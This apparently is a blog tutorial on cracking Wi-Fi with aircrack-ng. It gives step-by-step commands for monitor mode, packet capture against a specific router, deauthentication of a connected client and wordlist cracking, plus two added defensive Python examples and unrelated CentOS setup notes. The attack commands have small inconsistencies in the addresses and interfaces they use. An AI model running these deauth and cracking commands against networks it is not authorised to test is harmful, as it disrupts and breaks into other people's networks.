Learning to Use Aircrack-ng

Aircrack-ng

Aircrack-ng is a classic Wi-Fi cracking tool; in the spirit of learning about network security, this post walks through how the tool is used.

Install

sudo apt-get install aircrack-ng


ifconfig  # find the wireless card's interface name

Monitor mode

$ ifconfig

wlo1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.145 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::fde:f9f7:aa85:7a8 prefixlen 64 scopeid 0x20<link>
ether d4:25:8b:4e:e7:29 txqueuelen 1000 (Ethernet)
RX packets 24936 bytes 18477382 (18.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20360 bytes 4099659 (4.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


$ sudo airmon-ng start wlo1

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
1069 avahi-daemon
1081 avahi-daemon
1085 wpa_supplicant
1091 NetworkManager
4967 dhclient

PHY Interface Driver Chipset

phy0 wlo1 iwlwifi Intel Corporation Wireless 7265 (rev 59)

Fixing errors

Option 1:

$ sudo airmon-ng check kill

Killing these processes:

PID Name
1085 wpa_supplicant
7147 avahi-daemon
7148 avahi-daemon

Option 2:

SIOCSIFFLAGS: Operation not possible due to RF-kill

sudo rfkill list all
sudo rfkill unblock wifi

After fixing the error, run sudo airmon-ng start wlo1 again.

If ifconfig now shows a new virtual interface whose name ends in mon, monitor mode was enabled successfully!


wlo1mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec D4-25-8B-4E-11-11-11-11-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 43 bytes 6749 (6.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

airodump-ng

Help text:

airodump-ng --help

Airodump-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
http://www.aircrack-ng.org

usage: airodump-ng <options> <interface>[,<interface>,...]

Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
--manufacturer : Display manufacturer from IEEE OUI list
--uptime : Display AP Uptime from Beacon Timestamp
--wps : Display WPS information (if any)
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml
--ignore-negative-one : Removes the message that says
fixed channel <interface>: -1
--write-interval
<seconds> : Output file(s) write interval in seconds

Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
--essid <essid> : Filter APs by ESSID
--essid-regex <regex> : Filter APs by ESSID using a regular
expression
-a : Filter unassociated clients

By default, airodump-ng hop on 2.4GHz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channels> : Capture on specific channels
--band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch

--help : Displays this usage screen

Scan nearby Wi-Fi networks:

sudo airodump-ng -a --encrypt WPA wlo1mon

Capture packets

Use airodump-ng to capture packets.

--bssid is the router's MAC address
-w writes the capture to files with the prefix longas
-c 11 selects channel 11
--ivs captures only the IV packets that are usable for cracking

sudo airodump-ng --ivs --bssid FC:D7:33:3F:BC:F8 -w longas.cap -c 11 wlo1mon

Attack

We have now seen the MAC address of the target router, the MAC address of a client connected to it, and the channel it works on. Run:

Send traffic (deauthentication frames):

sudo aireplay-ng -0 10 -a FE:D7:33:58:90:9F -c  68:3E:34:CE:F3:83 mon8
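What the traffic from the aireplay-ng -0 command above looks like on the wire, and how a monitoring host can detect such a flood, as an added example that is not part of the original post or of aircrack-ng: a pure-Python parser for a pcap of raw 802.11 frames (link type 105, which airodump-ng .cap files typically use) that counts deauthentication and disassociation frames per BSSID in a sliding window and raises an alert when the count exceeds a threshold. The MAC addresses, the frame builder and the capture itself are constructed here so the example runs offline; on a real capture you would feed the bytes of the .cap file to detect_deauth_floods instead.

```python
"""Detect deauthentication floods in a pcap of raw 802.11 frames.

Added example for this tutorial, not aircrack-ng code. The capture is
constructed in memory (little-endian pcap, link type 105: 802.11 without a
radiotap header). A single deauth from an AP is normal; dozens per second
against one BSSID is the signature of a deauth flood.
"""
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105       # raw 802.11 frames, no radiotap header
DEAUTH, DISASSOC = 12, 10       # management-frame subtypes (type 0)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mgmt_frame(subtype, da, sa, bssid, seq, body=b""):
    """Minimal 802.11 management frame: FC, duration, addr1-3, sequence control, body."""
    fc0 = (subtype << 4) | (0 << 2) | 0          # type 0 = management, protocol version 0
    hdr = struct.pack("<BBH", fc0, 0x00, 0x013A)  # FC byte 0, FC flags, duration
    return (hdr + mac_bytes(da) + mac_bytes(sa) + mac_bytes(bssid)
            + struct.pack("<H", seq << 4) + body)


def build_pcap(records):
    """records: iterable of (timestamp_seconds, frame_bytes) -> pcap file bytes."""
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11))
    for ts, frame in records:
        sec = int(ts)
        usec = int(round((ts - sec) * 1_000_000))
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return bytes(out)


def iter_pcap(data):
    """Yield (timestamp, frame_bytes) from a little-endian pcap of link type 105."""
    magic, _vmaj, _vmin, _tz, _sig, _snap, linktype = struct.unpack_from("<IHHiIII", data, 0)
    if magic != 0xA1B2C3D4 or linktype != LINKTYPE_IEEE802_11:
        raise ValueError("expected little-endian pcap with raw 802.11 frames")
    off = 24
    while off + 16 <= len(data):
        sec, usec, incl, _orig = struct.unpack_from("<IIII", data, off)
        off += 16
        yield sec + usec / 1_000_000, data[off:off + incl]
        off += incl


def parse_80211(frame):
    """Return (type, subtype, addr1, addr2, addr3), or None for a truncated frame."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    return ((fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF,
            mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]))


def detect_deauth_floods(pcap_bytes, window=1.0, threshold=10):
    """Return {bssid: peak_count} for every BSSID that saw at least `threshold`
    deauth/disassoc frames inside any `window`-second interval."""
    times_by_bssid = defaultdict(list)
    for ts, frame in iter_pcap(pcap_bytes):
        parsed = parse_80211(frame)
        if parsed and parsed[0] == 0 and parsed[1] in (DEAUTH, DISASSOC):
            times_by_bssid[parsed[4]].append(ts)
    alerts = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        peak, start = 0, 0
        for i, t in enumerate(times):           # sliding window over sorted timestamps
            while times[start] < t - window:
                start += 1
            peak = max(peak, i - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts


# Constructed sample capture; all addresses are made-up, locally administered MACs.
AP = "02:00:00:00:00:01"
CLIENT = "02:00:00:00:00:02"
OTHER_AP = "02:00:00:00:00:03"
BROADCAST = "ff:ff:ff:ff:ff:ff"


def sample_capture():
    records = []
    for i in range(5):                              # ordinary beacons, 100 ms apart
        records.append((1.0 + i * 0.1, mgmt_frame(8, BROADCAST, AP, AP, i)))
    # one legitimate deauth from each AP (reason 3: station is leaving)
    records.append((2.0, mgmt_frame(DEAUTH, CLIENT, AP, AP, 5, struct.pack("<H", 3))))
    records.append((2.5, mgmt_frame(DEAUTH, CLIENT, OTHER_AP, OTHER_AP, 1, struct.pack("<H", 3))))
    for i in range(20):                             # flood: 20 deauths within 20 ms
        records.append((3.0 + i * 0.001, mgmt_frame(DEAUTH, CLIENT, AP, AP, 100 + i, struct.pack("<H", 7))))
    return build_pcap(records)


if __name__ == "__main__":
    print(detect_deauth_floods(sample_capture()))   # {'02:00:00:00:00:01': 20}
```

The threshold and window are tuning knobs: a busy AP legitimately sends occasional deauth frames, so alert on rate, not on presence, and keep the frames' source address in the alert so the event can be correlated with the AP's own logs.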

Restore the network card

sudo airmon-ng stop wlo1mon
sudo NetworkManager

Cracking with aircrack-ng

sudo aircrack-ng longas.cap -w /home/sweet/1.txt
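Why the wordlist attack in the command above works, and what each guess costs, as an added example that is not code from the post or from aircrack-ng: WPA/WPA2-PSK derives the pairwise master key from the passphrase and the SSID with PBKDF2-HMAC-SHA1 at 4096 iterations (IEEE 802.11i), and that derivation is the computation aircrack-ng has to repeat for every line of the wordlist. The block checks the derivation against the standard's published test vector, times it on the local CPU, and estimates how long exhausting a few passphrase policies would take at a given guess rate. The guess rate and the policies are assumed numbers for illustration only.

```python
"""WPA2-PSK key derivation and what it means for passphrase strength.
Added example, not part of aircrack-ng."""
import hashlib
import time

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA/WPA2-PSK
PMK_LEN = 32               # the PMK is 256 bits


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so a precomputed table only helps for one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def seconds_per_guess(ssid: str, samples: int = 20) -> float:
    """Cost of one candidate on this CPU (single-threaded Python; aircrack-ng's
    C code is faster per core, but the 4096 iterations are the same)."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f"candidate{i}", ssid)        # constructed throwaway candidates
    return (time.perf_counter() - t0) / samples


def keyspace(alphabet_size: int, length: int) -> int:
    return alphabet_size ** length


def seconds_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    return keyspace(alphabet_size, length) / guesses_per_second


def policy_report(guesses_per_second: float) -> dict:
    """Years needed to exhaust each (assumed, illustrative) passphrase policy."""
    policies = {
        "8 digits": (10, 8),
        "8 lowercase": (26, 8),
        "8 mixed alnum": (62, 8),
        "12 mixed alnum": (62, 12),
        "16 mixed alnum": (62, 16),
    }
    year = 365 * 24 * 3600
    return {name: seconds_to_exhaust(a, n, guesses_per_second) / year
            for name, (a, n) in policies.items()}


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print(wpa2_pmk("password", "IEEE").hex())
    print(f"{seconds_per_guess('IEEE'):.6f} s per guess on this machine")
    for name, years in policy_report(100_000).items():   # assumed 100k guesses/s
        print(f"{name:>15}: {years:.3g} years")
```

The numbers make the defensive point of the section: the 4096 iterations are a fixed cost per candidate, so a dictionary attack only succeeds when the passphrase is in the dictionary, and a long random passphrase pushes exhaustive search out of reach at any realistic guess rate.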

Running the capture through a VM (CentOS 7)

http://softwaretester.info/aircrack-ng-and-centos-7/

# add epel repository
$ yum install -y epel-release

# install needed software
$ yum install -y git-svn libpcap-devel sqlite-devel gcc gcc-c++ libnl-devel openssl-devel usbutils pciutils rfkill

# get the latest version (mine was Aircrack-ng 1.2 rc3 r2799)
$ svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng

# Compiling
$ cd aircrack-ng/
$ make install clean

Screen

yum install screen

screen -ls
screen -r 10157
Ctrl+a d  # detach from the session

RAR&7ZIP

wget http://www.rarlab.com/rar/rarlinux-3.8.0.tar.gz
tar -zxvf rarlinux-3.8.0.tar.gz
cd rar
su root
make
make install
exit

When running the rar command, the following problem appears:

rar: /lib/i686/nosegneg/libc.so.6: version `GLIBC_2.7' not found (required by rar)

Fix:

cp rar_static /usr/local/bin/rar

rar x passwd.rar  # extract passwd.rar into the current directory
sudo yum install epel-release
sudo yum install p7zip
7za x file.7z
7za x -o/tmp file.7z

Garbled Chinese characters on CentOS 7

vim /etc/locale.conf
LANG="zh_CN.GB18030"
LANGUAGE="zh_CN.GB18030:zh_CN.GB2312:zh_CN"
SUPPORTED="zh_CN.UTF-8:zh_CN:zh:en_US.UTF-8:en_US:en"
SYSFONT="lat0-sun16"

Make a little progress every day!!!!

impossible is I’m possible!!!